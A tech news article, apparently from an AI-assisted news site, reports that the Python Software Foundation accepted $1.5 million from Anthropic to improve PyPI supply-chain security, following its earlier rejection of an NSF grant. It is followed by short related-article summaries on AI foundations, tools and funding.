Python foundation accepts Anthropic funding after rejecting US grant

The Python Software Foundation has secured $1.5 million from Anthropic, the company behind Claude AI, for a two-year partnership focused on enhancing Python ecosystem security. This follows the foundation's rejection of similar funding from the US government last year over concerns about diversity, equity, and inclusion policies. The investment aims to protect the Python Package Index from supply chain attacks and support ongoing operations.

Python has become essential to modern AI development, powering frameworks like TensorFlow and PyTorch due to its accessibility and rich libraries. On January 15, 2026, the Python Software Foundation (PSF) announced a $1.5 million investment from Anthropic over the next two years.

Last year, the PSF rejected a comparable $1.5 million grant from the National Science Foundation (NSF). The decision stemmed from a clause allowing the NSF to reclaim funds if the PSF violated the US government's anti-DEI policies. Loren Crary of the PSF addressed this in a statement, highlighting the foundation's concerns.

Anthropic's funding targets security improvements for the Python ecosystem, particularly the Python Package Index (PyPI). PyPI hosts hundreds of thousands of packages and serves millions of developers worldwide but remains vulnerable to malicious open-source uploads. The partnership will develop automated review tools for uploaded packages, shifting from reactive measures to proactive detection.

Key initiatives include creating a dataset of known malware to train detection tools that spot suspicious patterns. This approach could extend to other open-source repositories. Beyond security, the funds will sustain PyPI operations, the Developers in Residence program for CPython contributions, and community grants.

Anthropic's contribution underscores its reliance on Python for operations, blending self-interest with community support. As AI firms increasingly depend on open-source infrastructure, such investments highlight the need for sustainable funding models amid corporate freeloading concerns.

관련 기사

Realistic illustration of Linux Foundation executives and AI partners launching Agentic AI Foundation, featuring collaborative autonomous AI agents on a conference screen.
AI에 의해 생성된 이미지

Linux Foundation launches Agentic AI Foundation

AI에 의해 보고됨 AI에 의해 생성된 이미지

The Linux Foundation has launched the Agentic AI Foundation to foster open collaboration on autonomous AI systems. Major tech companies, including Anthropic, OpenAI, and Block, contributed key open-source projects to promote interoperability and prevent vendor lock-in. The initiative aims to create neutral standards for AI agents that can make decisions and execute tasks independently.

The Linux Foundation announced the creation of the Agentic AI Foundation (AAIF) on December 9, 2025, in San Francisco, to foster open-source development of AI agents. Co-founded by Anthropic, Block, and OpenAI, the initiative includes donations of key projects: Anthropic's Model Context Protocol (MCP), Block's goose framework, and OpenAI's AGENTS.md. The foundation aims to promote interoperability and prevent fragmentation in AI agent technologies.

AI에 의해 보고됨

Anthropic's official Git MCP server contained worrying security vulnerabilities that could be chained together for severe impacts. The issues were highlighted in a recent TechRadar report. Details emerged on potential risks to the AI company's infrastructure.

Anthropic has introduced Cowork, a new tool that extends its Claude AI to handle general office tasks by accessing user folders on Mac computers. Designed for non-developers, it allows plain-language instructions to organize files, create reports, and more. The feature is available as a research preview for Claude Max subscribers.

AI에 의해 보고됨

베이징 기반 AI-for-science 기업 DP Technology가 연구개발 확대와 인재 영입을 위해 C라운드에서 8억 위안(1억 1400만 달러)을 초과하는 자금을 유치했다. 이번 라운드는 국영 연계 및 벤처 투자자들의 지원을 받았다. AI를 활용한 과학 발견 가속화에 대한 관심이 커지는 가운데 이뤄졌다.

AI coding agents from companies like OpenAI, Anthropic, and Google enable extended work on software projects, including writing apps and fixing bugs under human oversight. These tools rely on large language models but face challenges like limited context processing and high computational costs. Understanding their mechanics helps developers decide when to deploy them effectively.

AI에 의해 보고됨

AerynOS, an alpha-stage Linux distribution, has implemented a policy banning large language models in its development and community activities. The move addresses ethical issues with training data, environmental impacts, and quality risks. Exceptions are limited to translation and accessibility needs.

 

 

 

이 웹사이트는 쿠키를 사용합니다

사이트를 개선하기 위해 분석을 위한 쿠키를 사용합니다. 자세한 내용은 개인정보 보호 정책을 읽으세요.
거부